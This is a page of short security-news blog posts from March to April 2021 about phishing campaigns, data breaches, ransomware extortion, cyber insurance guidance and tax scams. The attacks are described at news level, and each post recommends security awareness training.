08Apr

Office 365 Phishing Kits Are Being Used in a New Attack Targeting Execs and Finance

April 8, 2021By 0 comment

A new highly-targeted phishing campaign is seeking to compromise the online credentials of those with influence within an organization using an Office 365-themed update attack.

The bad guys used to try to con anyone with the organization they could and then work to swim “upstream” to compromise someone in IT, an executive, etc. These days, the bad guys are dialed into using online tools like LinkedIn to identify their targets and work by using social engineering tactics to convince their victims into giving up valuable credentials.

In a new attack spotted by security vendor Area 1 targets financial departments, C-suite executives and executive assistants within the financial services, insurance and retail industries.

Using an Office 365 service update phishing email as the initial attack vector, prospective victims are encouraged to open the attachment to read about an important update. The attachment can be a PDF, HTML or HTM file.

Figure2-3

 

 

 

 

 

 

 

 

 

 

 

 

Source: Area 1

A JavaScript “unescape” command is used to obfuscate the HTML that loads a phishing kit-based Office 365 credential harvesting site. The phishing kit even includes a very realistic touch of popping up an updated privacy policy before allowing the user to continue.

Figure5-3

 

 

 

 

 

 

Source: Area 1

All this works to lower the victim’s defenses, establish credibility, and increase the chance of attack success.

Teaching users via Security Awareness Training to watch out for abnormal communications (such as “Microsoft” using an attachment to convey update details) can stop attacks like these in their tracks, no matter how convincing their phishing kit is.

READ MORE
07Apr

The Growing WeTransfer Phishing Campaign Can Put Your Users at Risk

April 7, 2021By 0 comment

Researchers at Avanan have observed a phishing campaign that’s impersonating the WeTransfer file-sharing app in an attempt to steal users’ credentials. The email’s subject line states, “You received some important files via WeTransfer!” The body of the email informs recipients that they’ve received three files through the service, with a link to “Get your files.”

The text of the email was worded awkwardly, however, which could tip some users off:

“Dear Sir/Madam,

Attached is our order catalogue and PO-209-2021 And Terms & Condition, please check if you can provide us with those, and quote.

Look forward to have a cooperation with you ,thanks.”

The email also states “Will be deleted by April 5, 2021” to instill a sense of urgency and motivate users to click the link. The link leads to a convincingly spoofed version of WeTransfer’s website, with a popup presenting a button for the user to download their new files. The names of the files are “List of Items.pdf,” “Drawings and Specifications.zip,” and “Company Profile.mp4.”

If the user clicks the button, they’ll be taken to a login page to verify their WeTransfer credentials. When they try to log in, their credentials will be sent to the attacker. The victim will be told that a technical error occurred, and the site will request that they re-enter their password.

“Hackers will do anything to get in your inbox,” Avanan concludes. “Posing as a trusted file-sharing source, with an email you may often get, tends to be a good way to do that.”

While this phishing attack isn’t highly sophisticated, some people will still probably fall for it. Avanan notes that the phishing site’s URL clearly didn’t resemble WeTransfer’s legitimate URL, so observant users could have recognized the scam. New-school security awareness training can teach your employees how to spot the signs of phishing attacks.

READ MORE
06Apr

[HEADS UP] Millions of Facebook Users’ Personal Information Has Been Leaked Online

April 6, 2021By 0 comment

A hacking forum recently published over 553 million personal data of Facebook users. The type of exposed data ranged from phone numbers, Facebook ID’s, full names, locations, birthdates, bios, and in some cases – email addresses.

Alan Gal, CTO of Hudson Rock, was the person who first discovered the data leak over the weekend. “A database of that size containing the private information such as phone numbers of a lot of Facebook’s users would certainly lead to bad actors taking advantage of the data to perform social engineering attacks [or] hacking attempts,” Gal said in a statement.

Unfortunately, this is not the first time personal information has been leaked of Facebook users. In 2019, the Facebook vulnerability exposed millions of users’ phone numbers that was pulled from Facebook’s servers that were in violation of the terms of service.

There’s not much Facebook can do because users are trusting Facebook with their data, and it’s up to Facebook to treat users’ data with care and sensitivity. Facebook should, however, notify users if there is a potential breach.

These types of data breaches should have a takeaway that your organization needs to be vigilant of any suspicious activity at all times. New-school security awareness training is of the utmost importance for make sure your users know how to respond to a potential scam.

READ MORE
01Apr

Recent Phishing Scams that Managed to Bypass Email Security Filters

April 1, 2021By 0 comment

Researchers at Armorblox describe several recent phishing scams that managed to bypass email security filters. The first attempted to gain access to users’ Facebook accounts.

“Recently, the Armorblox threat research team observed an email impersonating Facebook attempt to hit one of our customer environments,” Armorblox says. “The email was titled ‘Reminder: Account Verification’ with the sender name ‘Facebook’ and the sender domain ‘noreply@cc[.]mail-facebook[.]com’. The email informed victims that their account usage had been restricted due to some security concerns, and invited victims to verify their account activity to restore full access to their Facebook account.”

The email contains a link to a spoofed Facebook login page designed to steal the user’s credentials.

“The parent domain of the page is ‘sliderdoyle[.]com’, which should tell circumspect users that this isn’t a legitimate site,” the researchers write. “However, the surface-level resemblance of the page to Facebook’s real login portal combined with the urgency generated by the context of the email (restricted account access) means that many users will rush through this page and fill in their account details without looking at the URL.”

Another phishing email impersonated Apple and informed the recipient that their Apple account had been locked.

“The email was titled ‘Re: Your Apple ID has been locked on March 11, 2021 PST’ followed by a reference number,” Armorblox says. “The sender name was ‘Appie ID’, using a common technique of misspelling words to get past deterministic security techniques like filters/blocklists while still passing victims’ eye tests. The email informed victims that their Apple ID had been locked for security reasons. The email invited victims to verify their account within 12 hours of risk having their Apple ID suspended.”

In both of these cases, the scam could have been avoided if users had scrutinized the URL contained in the email. New-school security awareness training can help your employees recognize red flags associated with phishing attacks.

Armorblox has the story.

READ MORE
30Mar

Data Breach at Dutch Auto Shops Puts 7,3 Million Car Owners at Risk

March 30, 2021By 0 comment

The Netherlands is dealing with what looks like one of the largest data breaches in the nation so far. Late last week, Dutch public broadcaster NOS revealed that customer data of millions of car owners are available to cybercriminals. They were stolen from a Dutch company called RDC, that provides IT services to auto shops and car dealerships.

The stolen data includes home addresses, telephone numbers, birth dates, license plate numbers and car data of 7,3 million car owners.

Email addresses for 2,5 million car owners were listed. Some of the data is publicly available on the internet, the entire data set is offered on a popular hacker forum for 35.000 dollars. According to NOS, personal data of several well-known people are part of the data set, including that of a leader of a Dutch political party.

RDC has notified the Dutch authority for protection of personal data (Autoriteit Persoonsgegevens). The company is “shocked” about the stolen data and says it has no knowledge of a recent breach in their systems, suggesting cybercriminals have been holding on to the data for a while now.

Cybersecurity researcher John Fokker at McAfee tells reporters at NOS the data set is “super useful” for bad guys. “If they get their hands on this data, it just takes one click to see where expensive cars are probably parked. They can tell where people live and what car they drive.” Additionally, spear phishing becomes surprisingly easy for cybercriminals.

Research into the breach is ongoing. The Autoriteit Persoonsgegevens says there were 76 of these ‘mega data breaches’ (involving data of >100.000 people) in The Netherlands in 2020.

READ MORE
29Mar

REvil Ransomware Now Helps with Extortion by Offering to Call the Victim’s Contractors and the Media

March 29, 2021By 0 comment

The bad guys are going to great lengths to ensure they make their money. As part of its Ransomware-as-a-Service, REvil is now expanding its services to aid in the extortion phase.

REvil/Sodinkibi has been a major player in the RWaaS market, providing its’ affiliate bad guys with functional ransomware malware and a payment site. They are relying on the affiliate to attack, infiltrate, and compromise the victim networks in order to deploy the ransomware. This split of duties brings REvil somewhere between 20-30% of the ransom, with the affiliate taking the remainder home.

So, it’s mutually beneficial to both parties that the ransom first, be paid and second, be as much as possible. The exfiltrating of data and extorting the victim organization to pay or face publication of the stolen data has been growing over the last year since it was first seen used by Maze.

But a new twist on the extortion saga is the launching of a calling service where REvil will call the victim organizations business partners, local media, and more to bring the attack to light and force the organization to pay up to regain its operations.

Shown below, the ad asks for affiliates to provide organization details, chat contacts and phone numbers to call.

Evya9TeXcAEH77G

Source: Twitter

The bad guys aren’t going to be satisfied with just taking your ransom payment; they’re going to ensure they squeeze the maximum amount of money out of your organization they can.

READ MORE
24Mar

Insurers are Warned of Cyber Risk Growth and are Provided a New Cyber Insurance Risk Framework from the New York Department of Financial Services

March 24, 2021By 0 comment

As cyberattacks continue to increase, cyber insurers are always looking for ways to manage the cyber risk they take on. The NY DFS offers some best practices from top insurance companies.

I’ve covered a number of stories before of cyber insurers that did not pay out on a policy that involved some form of cyberattack. Usually it came down to a technicality or was denied due to specific attack scenarios outlined in the policy. Those news stories usually involve an insurer that is well-established and experienced in the field of cyber insurance. But for those insurers just now seeking to get into the market, without the proper experience, it could be costly if they’re not careful.

To assist, last month the NY DFS issued an open letter to property and casualty insurers, offering guidance in addressing their exposure to cyber risk through issued policies.

The framework, based on dozens of discussions with experienced cyber insurers, includes the following:

  1. Establish a Formal Cyber Insurance Risk Strategy – made up of the next six key practices, the strategy should define clear risk goals, involving senior management and the insurer’s governing body.
  2. Manage and Eliminate Exposure to Silent Cyber Insurance Risk – silent risk stems from any cyber loss that must be covered under a policy that does not explicitly mention cyber.
  3. Evaluate Systemic Risk – insureds relying on third-party vendors and supply chains can create an environment ripe for risk, which can result in a catastrophic loss to the insurer.
  4. Rigorously Measure Insured Risk – Insurers need to have a comprehensive plan to measure out the risk of a given insured. The word “rigorous” should be enough to get an idea of how much effort needs to be placed into this step.
  5. Educate Insureds and Insurance Producers – Helping the insured organization with security assessments and recommendations, as well as advocating Security Awareness Training for their employees will help reduce the risk of a claim event.
  6. Obtain Cybersecurity Expertise – You can’t insure what you don’t understand. Seek out industry expertise to assist with building out every part of this framework.
  7. Require Notice to Law Enforcement – victim organizations need to engage with local law enforcement to get assistance with data and fund recovery, prosecution of attackers, and more.
READ MORE
23Mar

Spoofing Tailored to Financial Departments

March 23, 2021By 0 comment

Researchers at Area 1 Security have warned of a large spear phishing campaign targeting financial departments and C-suite employees with spoofed Microsoft 365 login pages. The researchers say that in some cases the attackers “specifically targeted newly-selected CEOs during critical transitionary periods.” Additionally, the attackers went after executives’ assistants.

“Beyond financial departments, the attackers also targeted C-suite and executive assistants,” Area 1 says. “Targeting high-level assistants is an often overlooked method of initial entry, despite these employees having access to highly sensitive information and an overall greater level of privileges. In a few instances, the attackers even attempted to bait newly-selected CEOs of two major companies before any public announcements of this significant senior executive changeover were made.”

The attackers appear to have been attempting to conduct business email compromise scams.

“A large majority of the phishing attacks stopped by Area 1 Security were headed to financial controllers and treasurers at various international companies,” the researchers write. “By targeting the financial departments of these companies, the attackers could potentially gain access to sensitive data of third parties through invoices and billing, commonly referred to as a BEC (Business Email Compromise) attack. This enables the attackers to send forged invoices from legitimate email addresses to suppliers, resulting in payments being made to attacker-owned accounts.”

The researchers note that the phishing emails were able to bypass email security measures, and the attackers seem to have been more sophisticated than most cybercriminals.

“Clever tactics were used to not only craft the phishing messages, but also to send those messages, as well as to obtain passwords,” the researchers write. “These methods utilized a number of techniques at every step — including legitimate-looking domains and login pages, plus advanced phishing kits — to bypass email authentication and Microsoft’s email defenses. It’s clear that the masterminds behind these attacks possess above-average skills compared to your typical credential harvesting schemers.”

New-school security awareness training can enable your employees to thwart targeted social engineering attacks.

READ MORE
22Mar

Ransomware Attacks Are Growing More Costly and Effective by the Day

March 22, 2021By 0 comment

The availability of commodity bots and ransomware is making the business of ransomware accessible to just about every. And, according to new data, everyone’s getting in on the game.

I love reports that provide an insightful view into what the bad guys are doing, quantifying what we’re all experiencing as an industry. A new report from threat intelligence firm Group-IB entitled Ransomware Uncovered 2020-2021 sheds some much needed light on the current state of not just attacks, but the specific methods and techniques used in today’s ransomware attacks.

According to the report:

  • The average ransom in 2020 was $170,000; up from $80,000 in 2019
  • The average dwell time on a victim network was 13 days
  • The average downtime resulting from an attack is 18 days

Digging a bit deeper…

  • Almost one-third (29%) of attacks start with phishing
  • Almost two-thirds (64%) of attacks are via Ransomware-as-a-Service

There are two very frightening predictions in this report.

“More actors will focus on gaining access to enterprise networks for resale purposes.”

and

“Some threat actors may abandon the use of ransom-ware and instead focus on exfiltrating sensitive data for extortion.”

Think about it what all this means: more hackers will be looking to simply gain compromised access to your environment to sell it to the would-be cyberattackers who have access to even more effective and readily-available RaaS.

This is bad news, indeed.

As the bad guys ramp up their efforts to make more money off of victim organizations, it’s equally important that you begin increasing your security stance against these kinds of attacks – specifically focusing on the phishing aspect of attacks by putting employees through new school Security Awareness Training. By continually educating users about cyber attack methods and scams, they are more prepared to spot one before they’ve made the mistake of engaging with it and putting the organization at risk.

READ MORE
19Mar

Another Tax Season, Another Opportunity for Scams

March 19, 2021By 0 comment

It’s the start of tax season. This is the time of year when we collect our receipts and tax forms and hope for a nice big refund from the U.S. government. Unfortunately, cybercriminals are also looking for a nice big score as well. This year is going to be worse than ever, as many people have been struggling to make ends meet during the pandemic and are really looking forward to that refund.

According to an article by Bleeping Computer, taxpayers are being targeted with phishing attacks with RAT malware that is more aggressive than ever before. And with the new extended deadline, this only means these cybercriminals will use every social engineering technique in the book. As unemployment has skyrocketed and people have found themselves struggling to pay the bills, the pressure is on and many will look to their potential tax refund for some relief. This is going to open the door for scammers and cybercriminals to practice their craft.

Don’t Let Your Emotions Get The Best of You

Two of the most powerful tools in the scammer’s toolbox are fear and anxiety. These emotions push people’s brains into a mode of thinking closest to their animal instincts. This is known as System 1 thinking, the automatic and fast way that humans make decisions. While this method of thinking is very handy when helping us avoid a soccer ball kicked at us, it interferes with our ability to make rational decisions. By exploiting our emotions, the attackers can improve their chance that victims will overlook important gaps in the stories they are using against them. Due to COVID-19 and the anxiety already being felt, this year will be worse than ever when it comes to tax scams.

Tax scams are nothing new. They have been happening for decades. Some cybercriminals target the tax forms of the employees of entire organizations, while others target individuals for sensitive personal information and bank account information.

Same Old Attack, New Approach

W-2 scams have varied in popularity over the last few years, but never truly die off. In these scams, the attacker typically contacts the target, often a member of the HR staff, through a phishing email. The contact is made to look like it came from an executive and has requested the W-2s of all of the employees for some sort of tax reason. There is usually a story that makes the request seem urgent and a request to just attach them to an email reply. The email address they reply to with the attachment is not the executive, but the scammer. This year, I expect many of the stories behind the urgency to be COVID-19 related. I suspect we will see tales about the IRS being behind in processing so they need to file taxes early, or that some COVID-19 related tax break or credit is due to expire and they will miss it if they do not get the taxes done immediately. Once acquired, attackers will either sell the information from the tax forms or will attempt to file taxes on a victim’s behalf, claiming a significant refund, using the information on the W-2s. Then when the legitimate person tries to file his/her taxes, he/she is told it has already been done. This can take a year or more to sort out with the IRS and is very unpleasant. Organizations need to be aware of, and be prepared for, these attacks in order to protect their employees.

Another common scam around this time of year is the request to ‘verify’ a bank account. The victim will receive an email or text message pretending to be from the IRS or their bank, and will ask them to verify their account information, usually through an included link. They are often told their refund will not be deposited unless they take this step. This link will lead to a fake login page where the individual will enter their login information to ‘verify’ the account. This really just sends their login information to the cybercriminals, who then use it to access the account themselves.

Always Think Before You Click!

These are just a couple of the scams we can expect to see in the midst of heightened tensions and feelings of desperation caused by the pandemic. The best defense against these is information. It is important to teach people how to identify how the scams work so they can spot the signs regardless of the story being used. People should be taught that when confronted with an email, text message or even a phone call that causes a strong emotional response, it should be a warning sign that alerts them to be suspicious. In addition, if sensitive information of any kind is being requested, the recipient should attempt to confirm the request through a Google search (e.g., “IRS email to verify bank accounts”), or in the case of executive requests, verify the request with them over the phone on a known, good phone number.

Many of us are tired, stressed and dealing with situations we never dreamed possible two years ago. However, we need to stay vigilant against attackers that are using this to their advantage before May 17th. If we don’t, we are likely to add more stress to our lives when the attackers win with their social engineering tactics.

READ MORE